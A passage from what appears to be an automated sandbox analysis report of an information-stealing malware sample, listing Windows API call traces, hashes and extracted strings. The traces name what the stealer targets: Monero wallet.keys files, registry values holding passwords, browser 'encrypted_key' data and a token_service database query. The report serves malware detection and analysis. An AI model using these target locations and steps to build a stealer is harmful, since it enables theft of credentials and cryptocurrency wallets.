                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 0d3ddbc8f9a726fafd76727dfc4f6db4af584eede1d7baa3e5ed45c765e2d7da
                                    • Instruction ID: 3cd626bda36bc39c74cb4a07350e021cd63aa727957f23ae9fedae19ed60dc09
                                    • Opcode Fuzzy Hash: 0d3ddbc8f9a726fafd76727dfc4f6db4af584eede1d7baa3e5ed45c765e2d7da
                                    • Instruction Fuzzy Hash: 3DC1B5B590020DABCB28EFA1DC99FEA7378BF54304F104598E11AA7141EB74EA85DF91
                                    APIs
                                      • Part of subcall function 00FB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FB8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB42EC
                                    • lstrcat.KERNEL32(?,008CE298), ref: 00FB430B
                                    • lstrcat.KERNEL32(?,?), ref: 00FB431F
                                    • lstrcat.KERNEL32(?,008CD3F0), ref: 00FB4333
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FB8D90: GetFileAttributesA.KERNEL32(00000000,?,00FA1B54,?,?,00FC564C,?,?,00FC0E1F), ref: 00FB8D9F
                                      • Part of subcall function 00FA9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FA9D39
                                      • Part of subcall function 00FA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                      • Part of subcall function 00FA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                      • Part of subcall function 00FA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                      • Part of subcall function 00FA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                      • Part of subcall function 00FA99C0: LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                      • Part of subcall function 00FA99C0: CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                      • Part of subcall function 00FB93C0: GlobalAlloc.KERNEL32(00000000,00FB43DD,00FB43DD), ref: 00FB93D3
                                    • StrStrA.SHLWAPI(?,008CE208), ref: 00FB43F3
                                    • GlobalFree.KERNEL32(?), ref: 00FB4512
                                      • Part of subcall function 00FA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9AEF
                                      • Part of subcall function 00FA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B01
                                      • Part of subcall function 00FA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9B2A
                                      • Part of subcall function 00FA9AC0: LocalFree.KERNEL32(?,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB44A3
                                    • StrCmpCA.SHLWAPI(?,00FC08D1), ref: 00FB44C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FB44D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 00FB44E5
                                    • lstrcat.KERNEL32(00000000,00FC0FB8), ref: 00FB44F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: 372b2bdbb2c4816c63f404826c6e1792d4cf0f400cdcb895bcc0645693633dd7
                                    • Instruction ID: af502799e8333fb09e7dd94a638d4fab6a21c12d4e21cb9e3c3ec2e1f3591a2c
                                    • Opcode Fuzzy Hash: 372b2bdbb2c4816c63f404826c6e1792d4cf0f400cdcb895bcc0645693633dd7
                                    • Instruction Fuzzy Hash: 627174B6900208ABDB24EBE0DC85FEE77BDAF88300F044598F61597181DA78EB55DF91
                                    APIs
                                      • Part of subcall function 00FA12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FA12B4
                                      • Part of subcall function 00FA12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00FA12BB
                                      • Part of subcall function 00FA12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FA12D7
                                      • Part of subcall function 00FA12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FA12F5
                                      • Part of subcall function 00FA12A0: RegCloseKey.ADVAPI32(?), ref: 00FA12FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FA134F
                                    • lstrlen.KERNEL32(?), ref: 00FA135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00FA1377
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB8B60: GetSystemTime.KERNEL32(00FC0E1A,008CA8B0,00FC05AE,?,?,00FA13F9,?,0000001A,00FC0E1A,00000000,?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FB8B86
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00FA1465
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                      • Part of subcall function 00FA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                      • Part of subcall function 00FA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                      • Part of subcall function 00FA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                      • Part of subcall function 00FA99C0: LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                      • Part of subcall function 00FA99C0: CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FA14EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: dff07c43d0a9199533bbd33bf3ca6fd447a65818853d016e179da6eb3d850f88
                                    • Instruction ID: ec940aafa2380dbb075e26a64829559206e9a62889cdf7a3f3dd5ade721b2200
                                    • Opcode Fuzzy Hash: dff07c43d0a9199533bbd33bf3ca6fd447a65818853d016e179da6eb3d850f88
                                    • Instruction Fuzzy Hash: 305159B1D501196BCB25FB61DD92FED737CAF54300F4041A8B60A66081EF346B85DFA6
                                    APIs
                                      • Part of subcall function 00FA72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FA733A
                                      • Part of subcall function 00FA72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FA73B1
                                      • Part of subcall function 00FA72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FA740D
                                      • Part of subcall function 00FA72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00FA7452
                                      • Part of subcall function 00FA72D0: HeapFree.KERNEL32(00000000), ref: 00FA7459
                                    • lstrcat.KERNEL32(00000000,00FC17FC), ref: 00FA7606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FA7648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00FA765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FA768F
                                    • lstrcat.KERNEL32(00000000,00FC1804), ref: 00FA76A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FA76D3
                                    • lstrcat.KERNEL32(00000000,00FC1808), ref: 00FA76ED
                                    • task.LIBCPMTD ref: 00FA76FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: d8708abdc929181640fbaf89b815155196b6b3cf1ce91ee046587def5be736a7
                                    • Instruction ID: aa7e4d66d1ec7c7c491ba3aea1e7caed9e92f48bf6f6c53c221ce0816ef972d9
                                    • Opcode Fuzzy Hash: d8708abdc929181640fbaf89b815155196b6b3cf1ce91ee046587def5be736a7
                                    • Instruction Fuzzy Hash: BE3154B1D00109DFCB18EBE4EC55EFE77B4BF8A301B104128F112AB285DA34A946DF51
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FA4839
                                      • Part of subcall function 00FA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FA4849
                                    • InternetOpenA.WININET(00FC0DF7,00000001,00000000,00000000,00000000), ref: 00FA610F
                                    • StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA6147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00FA618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FA61B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00FA61DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FA620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00FA6249
                                    • InternetCloseHandle.WININET(?), ref: 00FA6253
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA6260
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: d043eab4113ed4fee0829bb5906bb5fa25861525cdc6e35e6dba1b884e29914b
                                    • Instruction ID: 9fa7b17633c8bf25ee0428ebf351e341ec483ed8cd5fb8ecdf1707afac25dc13
                                    • Instruction Fuzzy Hash: 8D5182B1D40218ABDF24DFA0DC45BEE77B8EF44705F1080A8B606AB1C0DB75AA85DF95
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FA733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FA73B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FA740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FA7452
                                    • HeapFree.KERNEL32(00000000), ref: 00FA7459
                                    • task.LIBCPMTD ref: 00FA7555
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 4d483e3003159c04bf88ca4d88148908000e301501b1eb10203799bba265aac6
                                    • Instruction ID: e4889a0260dd15061b672959afa51bfd9d2c4d4c8b8f8e71bfa7962e4e397909
                                    • Instruction Fuzzy Hash: 73613AB5D042689BDB24DB50DC41FDAB7B8BF49300F0081E9E649A6141EFB46BC9DFA1
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                    • lstrlen.KERNEL32(00000000), ref: 00FABC9F
                                      • Part of subcall function 00FB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FB8E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00FABCCD
                                    • lstrlen.KERNEL32(00000000), ref: 00FABDA5
                                    • lstrlen.KERNEL32(00000000), ref: 00FABDB9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 707655eb57741f3b6d987948c87dcaa363a07ae95d14a93506033c2fe48e6bdd
                                    • Instruction ID: b7a2437d8fa88470df366539a7d670794e37ac401093f58f4228dadfc5d9d7b4
                                    • Instruction Fuzzy Hash: 3AB14071910108ABDB14FBE1DD96EEE737CAF54300F404168F506A7492EF38AA59EF62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: f61cc94c0e2ef63638a52eb0b284986b3fe801101218adb32a42f64cdffa048c
                                    • Instruction ID: 75236872ca2ac127accd5167d71d1d24c423704d6e990a9f06318609d59db5b4
                                    • Instruction Fuzzy Hash: 5FF03A34D84209EFD358DFE0B509B6C7BB4FF04703F1402A8E61A8B284DA754AC19B95
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FA4FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FA4FD1
                                    • InternetOpenA.WININET(00FC0DDF,00000000,00000000,00000000,00000000), ref: 00FA4FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FA5011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00FA5041
                                    • InternetCloseHandle.WININET(?), ref: 00FA50B9
                                    • InternetCloseHandle.WININET(?), ref: 00FA50C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: 9c2a4da06800980166f3e46ea85776f42a2374e9f51e9a8e8e10ef21d8e84de7
                                    • Instruction ID: 43d0fda1064666207b0e696c624fb3d764ffba9e576fa062103a9d725c87ddba
                                    • Instruction Fuzzy Hash: F23108F5A40218ABDB24CF94DC85BDCB7B4EB48704F1081E8F709A7284C7746AC59F99
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008CDE48,00000000,?,00FC0E2C,00000000,?,00000000), ref: 00FB8130
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB8137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00FB8158
                                    • wsprintfA.USER32 ref: 00FB81AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2922868504-3474575989
                                    • Opcode ID: 02482d7aad38b8ccd39baf90604e3698117bc2807419daf191ea370eb28f2def
                                    • Instruction ID: 550abe241d239d863cfb77b55e62cf1b5a60d1b5580e83aafdde2eca7c61ea98
                                    • Instruction Fuzzy Hash: 2A2129B1E44208ABDB14DFD5DC49FAEBBB8EB44B50F104119F615BB280D77859018BA5
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FB8426
                                    • wsprintfA.USER32 ref: 00FB8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FB847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB8499
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,008CDE90,00000000,000F003F,?,00000400), ref: 00FB84EC
                                    • lstrlen.KERNEL32(?), ref: 00FB8501
                                    • RegQueryValueExA.ADVAPI32(00000000,008CE0A0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00FC0B34), ref: 00FB8599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB8608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB861A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: ebea88796d50408731898c90e232dd26fd6f621d7acc76daa0e8b8b588d1693a
                                    • Instruction ID: f219e54a6b0b00e434d20bfbab8e79bb6f5dc55681b9881659ae2995d623402a
                                    • Instruction Fuzzy Hash: AA210A71900218ABDB24DB94DC85FE9B7B9FF48700F00C1A8A60997140DF71AAC6CFE4
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB76A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB76AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,008BC3F0,00000000,00020119,00000000), ref: 00FB76DD
                                    • RegQueryValueExA.ADVAPI32(00000000,008CDFB0,00000000,00000000,?,000000FF), ref: 00FB76FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB7708
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: a21ac8ec95813d9f342f3ab82b26fcd6f92a803de96ec73fc9f8ed3a6e0b7c0f
                                    • Instruction ID: 5e512e31aa1704307265657c0f5e1dd78756a94040fc7300248268f9690327f9
                                    • Instruction Fuzzy Hash: ED01A2B5A44308BBD714EBE1EC49FADB7F8EF48701F104064FA15DB284DA7099409F50
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,008BC3F0,00000000,00020119,00FB76B9), ref: 00FB775B
                                    • RegQueryValueExA.ADVAPI32(00FB76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00FB777A
                                    • RegCloseKey.ADVAPI32(00FB76B9), ref: 00FB7784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: abcebfa7b30df13ef1228b0435e4656208e16e2cd85c33c5ea69c43308ca21f8
                                    • Instruction ID: 5f135b96d455cb389e4fd47cfc2ab376af2ca4a43ef2e71492d967268e09b850
                                    • Opcode Fuzzy Hash: abcebfa7b30df13ef1228b0435e4656208e16e2cd85c33c5ea69c43308ca21f8
                                    • Instruction Fuzzy Hash: D10144B5E40308BBDB14DBE0EC4AFAEB7B8EF44701F104168FA15AB285DA755541CF51
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                    • LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
